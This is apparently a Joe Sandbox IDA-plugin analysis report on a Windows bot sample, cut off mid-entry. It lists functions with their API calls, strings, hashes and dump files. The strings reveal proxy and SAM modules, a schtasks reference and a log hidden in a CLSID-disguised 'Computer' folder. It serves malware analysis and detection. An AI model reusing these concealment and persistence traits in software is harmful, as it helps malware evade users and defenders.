Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-3859226547
Opcode ID: b8c435b17a6ef23cfb8460f78b217bff15c05e77e3db55a1d2b9b66e6430e794
Instruction ID: e0455db42af4a6b8e0a742d7b540ca3990b7d7e06c9bfb3cea2d5043c5d00940
Opcode Fuzzy Hash: b8c435b17a6ef23cfb8460f78b217bff15c05e77e3db55a1d2b9b66e6430e794
Instruction Fuzzy Hash: 5D31F960A0DE0391FB529B57E8A03B8336AAF44BB4F4485B9D90D4B3B5EF2DE945C301

Function 00007FFE0EB4F18E Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0EB4F1A3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB4F227
GetProcessHeap.KERNEL32 ref: 00007FFE0EB4F25E
HeapAlloc.KERNEL32 ref: 00007FFE0EB4F272

Strings

[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0EB4F2F6
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE0EB4F249
mem_alloc, xrefs: 00007FFE0EB4F2BE
ebus_subscribe, xrefs: 00007FFE0EB4F1C8, 00007FFE0EB4F242, 00007FFE0EB4F2EF
H:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE0EB4F1BA
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB4F1CF
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0EB4F2C5
(handler != NULL), xrefs: 00007FFE0EB4F1C1

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-3859226547
Opcode ID: a762dfd8b90ea0ba55ae7e7045af3371dad3685b00934e94581181074cf90e35
Instruction ID: 81237b5a8cbeaa394d6effe3b18185732daf2eb2999510cf525084fec6dbfd63
Opcode Fuzzy Hash: a762dfd8b90ea0ba55ae7e7045af3371dad3685b00934e94581181074cf90e35
Instruction Fuzzy Hash: FF314BA6F0DB0781FA70AF45E8507B52361EF40B84F48A535D9DD4B3B4EE6CA886CB41

Function 00007FFE0E161AAE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE0E161AC3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E161B47
GetProcessHeap.KERNEL32 ref: 00007FFE0E161B7E
HeapAlloc.KERNEL32 ref: 00007FFE0E161B92

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E161BE5
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0E161C16
mem_alloc, xrefs: 00007FFE0E161BDE
ebus_subscribe, xrefs: 00007FFE0E161AE8, 00007FFE0E161B62, 00007FFE0E161C0F
H:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE0E161ADA
(handler != NULL), xrefs: 00007FFE0E161AE1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E161AEF
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE0E161B69

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-3859226547
Opcode ID: c4a16a67b84c36c7671208724b9cc0f47182419d13bd8251ab0d063fcc4a33ae
Instruction ID: f809e5bcf29454bc53b3a8097ba045c2767ebd1db967445710e23fdffe2e75d2
Opcode Fuzzy Hash: c4a16a67b84c36c7671208724b9cc0f47182419d13bd8251ab0d063fcc4a33ae
Instruction Fuzzy Hash: 63310761F0EA17A1FA109B15E8503B523B1BF44B84F598537CCDD5B2B6EE2CA945C340

Function 00007FFE11EC38AE Relevance: 18.1, APIs: 4, Strings: 8, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFE11EC38C3
LeaveCriticalSection.KERNEL32 ref: 00007FFE11EC3947
GetProcessHeap.KERNEL32 ref: 00007FFE11EC397E
HeapAlloc.KERNEL32 ref: 00007FFE11EC3992

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC38EF
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11EC39E5
(handler != NULL), xrefs: 00007FFE11EC38E1
ebus_subscribe, xrefs: 00007FFE11EC38E8, 00007FFE11EC3962, 00007FFE11EC3A0F
[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE11EC3A16
H:/Projects/rdp/bot/codebase/ebus.c, xrefs: 00007FFE11EC38DA
[E] (%s) -> Failed(handler=0x%p,err=%08x), xrefs: 00007FFE11EC3969
mem_alloc, xrefs: 00007FFE11EC39DE

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: CriticalHeapSection$AllocEnterLeaveProcess
String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
API String ID: 285244410-3859226547
Opcode ID: 5f505093072f9111e4430611d5cc52738c1ec3e9a09dee5057f21a5072703155
Instruction ID: 853aad9ade9044f4636b20f2e699d0d7bd6b47f6383d24d34c5554e128a99255
Opcode Fuzzy Hash: 5f505093072f9111e4430611d5cc52738c1ec3e9a09dee5057f21a5072703155
Instruction Fuzzy Hash: D6310561E0DE1781FF119B86EC403FB6269AF45BB0F8895B1C85D1B3B4EE2DB9858340

Function 00007FFE0EB4785C Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB47877
GetLastError.KERNEL32 ref: 00007FFE0EB478B6

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

Done, xrefs: 00007FFE0EB4788F
, xrefs: 00007FFE0EB478D4
[I] (%s) -> %s, xrefs: 00007FFE0EB4789D
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu), xrefs: 00007FFE0EB478C8
~, xrefs: 00007FFE0EB47931
P, xrefs: 00007FFE0EB47936
proxy_init, xrefs: 00007FFE0EB47896, 00007FFE0EB478C1, 00007FFE0EB4797C
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB47983

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
API String ID: 3179112426-3318474754
Opcode ID: 593a7781bc7a4bf816153e54f9c9506200529e0c415f8a53ca55c7ef5cea6f3d
Instruction ID: ed68d24cb66e49d7caeb881e0ffb7285cc576de9af170e7eaab7acede10a531b
Opcode Fuzzy Hash: 593a7781bc7a4bf816153e54f9c9506200529e0c415f8a53ca55c7ef5cea6f3d
Instruction Fuzzy Hash: 3731E6B1E1C767E2FB345F55A5C03B82260EF49344E641133C6DE4A2B2DF5DA985DB02

Function 00007FFE0E165A84 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 77COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E165A95
GetLastError.KERNEL32 ref: 00007FFE0E165AD4

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E165BA1
P, xrefs: 00007FFE0E165B54
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu), xrefs: 00007FFE0E165AE6
sam_init, xrefs: 00007FFE0E165AB4, 00007FFE0E165ADF, 00007FFE0E165B9A
[I] (%s) -> %s, xrefs: 00007FFE0E165ABB
, xrefs: 00007FFE0E165AF2
~, xrefs: 00007FFE0E165B4F
Done, xrefs: 00007FFE0E165AAD

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
API String ID: 3179112426-2019511216
Opcode ID: fe9a3da2f301612be97818888d750b8a7241ff7b119f8a7d22111b0f4ab332f1
Instruction ID: c637efb9595c78f8449e50da212b71eccb3b25cf6f4bd80c1af265ce5ffb3c6c
Opcode Fuzzy Hash: fe9a3da2f301612be97818888d750b8a7241ff7b119f8a7d22111b0f4ab332f1
Instruction Fuzzy Hash: ED31E860F0C70B82FB205714A4D03B92263BF09744FA41937C5DE462F7DEAEA9859755

Function 00007FFE1150A060 Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 145stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1150A0FA
strlen.MSVCRT ref: 00007FFE1150A116
strlen.MSVCRT ref: 00007FFE1150A127
strlen.MSVCRT ref: 00007FFE1150A161
strlen.MSVCRT ref: 00007FFE1150A17D
strcpy.MSVCRT ref: 00007FFE1150A199
strlen.MSVCRT ref: 00007FFE1150A1A1
strlen.MSVCRT ref: 00007FFE1150A1B0
strlen.MSVCRT ref: 00007FFE1150A1C5

Strings

*, xrefs: 00007FFE1150A1A6
schtasks, xrefs: 00007FFE1150A12F

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$strcpy
String ID: *$schtasks
API String ID: 2790333442-2394224502
Opcode ID: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
Instruction ID: f3d49086abe0829a7808295de86a5ab0a7ac2979fc000f2a611be899a0925c01
Opcode Fuzzy Hash: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
Instruction Fuzzy Hash: A5510912B0CE8386F7619AA7A8913FD6359AF843A4F4801B9DA4E473F6DE3DD9048300

Function 00007FF76A9099E2 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FF76A909A8E
fflush.MSVCRT ref: 00007FF76A909A9A
EnterCriticalSection.KERNEL32(service,000001DE38FB13D0,?,00007FF76A9184F0,00007FF76A9013B7,?,?,?,?,?,?,00007FF76A9084AF), ref: 00007FF76A909AB3
LeaveCriticalSection.KERNEL32(?,00007FF76A9184F0,00007FF76A9013B7,?,?,?,?,?,?,00007FF76A9084AF), ref: 00007FF76A909ADB
CopyFileA.KERNEL32 ref: 00007FF76A909B38

Strings

service, xrefs: 00007FF76A9099E5
1, xrefs: 00007FF76A909B22
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF76A909AFB
., xrefs: 00007FF76A909B1D

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
API String ID: 513531256-4171087551
Opcode ID: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
Instruction ID: e6416c27ae5a11cd87c75af9e85f63e853512b5f7aba88e6b1d27e121130d34f
Opcode Fuzzy Hash: 63c08d7458072f3ffe3d65f4f93f73f9d412e0c73241e0ce27064e40afdb8958
Instruction Fuzzy Hash: 5641AF61A0C741CAF325BB19E8513AAF261BB857C0FE440B8DA4DC3795CF3CE9869760

Function 00007FFE11507AB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE11507B50
_strtoui64.MSVCRT ref: 00007FFE11507B66
_errno.MSVCRT ref: 00007FFE11507B70
_errno.MSVCRT ref: 00007FFE11507B7C

Strings

[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE11507BA3
ini_get_uint64, xrefs: 00007FFE11507B2F, 00007FFE11507B9C
(value != NULL), xrefs: 00007FFE11507B28
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11507B36
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11507B21

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: cd842bbf93fc22e180acf29d7a32dde013ceaa6f021aa54525153110a013c35c
Instruction ID: 66626f3f86ff5ba62362b77ec4f4b7f0a18de9e35d66f7c756fa58a7522724f0
Opcode Fuzzy Hash: cd842bbf93fc22e180acf29d7a32dde013ceaa6f021aa54525153110a013c35c
Instruction Fuzzy Hash: 13219F21608E4395E7129F96F8407AA3369FB447A8F444176EE8D47774DF7CE989C700

Function 00007FFE0EB49004 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE0EB490A0
_strtoui64.MSVCRT ref: 00007FFE0EB490B6
_errno.MSVCRT ref: 00007FFE0EB490C0
_errno.MSVCRT ref: 00007FFE0EB490CC

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB49086
(value != NULL), xrefs: 00007FFE0EB49078
ini_get_uint64, xrefs: 00007FFE0EB4907F, 00007FFE0EB490EC
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EB49071
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE0EB490F3

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: d2f05f6895ab16ea1790c9ad55f69667827c6085d803c5578b06ea742afccf19
Instruction ID: 2af4fb2fc3beef764780ee551f62c638ddbc67e40f08003402780adadefd688d
Opcode Fuzzy Hash: d2f05f6895ab16ea1790c9ad55f69667827c6085d803c5578b06ea742afccf19
Instruction Fuzzy Hash: 3C215762A08B4796E6329F19F8407AA33A4EB85794F444032EEDC477B5DF3CE985CB00

Function 00007FFE0E16C974 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE0E16CA10
_strtoui64.MSVCRT ref: 00007FFE0E16CA26
_errno.MSVCRT ref: 00007FFE0E16CA30
_errno.MSVCRT ref: 00007FFE0E16CA3C

Strings

[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE0E16CA63
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16C9F6
ini_get_uint64, xrefs: 00007FFE0E16C9EF, 00007FFE0E16CA5C
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E16C9E1
(value != NULL), xrefs: 00007FFE0E16C9E8

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: d6536c4924c2170733df2ec152e605617808f256ca11fd9956fd9b6b2a7b32ec
Instruction ID: a0f4585151e7d89a01ac7b80dbb5c4765a4e07935952c2e35098b0c435e8e8c3
Opcode Fuzzy Hash: d6536c4924c2170733df2ec152e605617808f256ca11fd9956fd9b6b2a7b32ec
Instruction Fuzzy Hash: 6A21AB62A08A8795E7109F59F8407AA7361FB88B88F444033EECD47675DF3CE949C740

Function 00007FFE11EC8AB4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE11EC8B50
_strtoui64.MSVCRT ref: 00007FFE11EC8B66
_errno.MSVCRT ref: 00007FFE11EC8B70
_errno.MSVCRT ref: 00007FFE11EC8B7C

Strings

ini_get_uint64, xrefs: 00007FFE11EC8B2F, 00007FFE11EC8B9C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC8B36
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11EC8B21
(value != NULL), xrefs: 00007FFE11EC8B28
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE11EC8BA3

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2069802722
Opcode ID: 3fd9e565cbf0a0b73623f0fd5ed6820d7f93ff00c62f70379f5a601540ffba6b
Instruction ID: a80b89ed3d44cbffa10236af6bc9cef5b4c344af25bd96bc5d77983951c0607f
Opcode Fuzzy Hash: 3fd9e565cbf0a0b73623f0fd5ed6820d7f93ff00c62f70379f5a601540ffba6b
Instruction Fuzzy Hash: 33218B21608E4686E7519F96FC40BAB3368EB447A4F845072EE4C47674DF3CE885C700

Function 00007FFE11507590 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE1150767C

Strings

(var != NULL), xrefs: 00007FFE11507638
(name != NULL), xrefs: 00007FFE11507605
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE115076F5
NULL, xrefs: 00007FFE1150770E, 00007FFE11507717
(sec != NULL), xrefs: 00007FFE115075D2
ini_get_var, xrefs: 00007FFE115075D9, 00007FFE1150760C, 00007FFE1150763F, 00007FFE115076A6, 00007FFE115076EE
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE115076AD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115075E0, 00007FFE11507613, 00007FFE11507646
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE115075CB, 00007FFE115075FE, 00007FFE11507631

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: strcmp
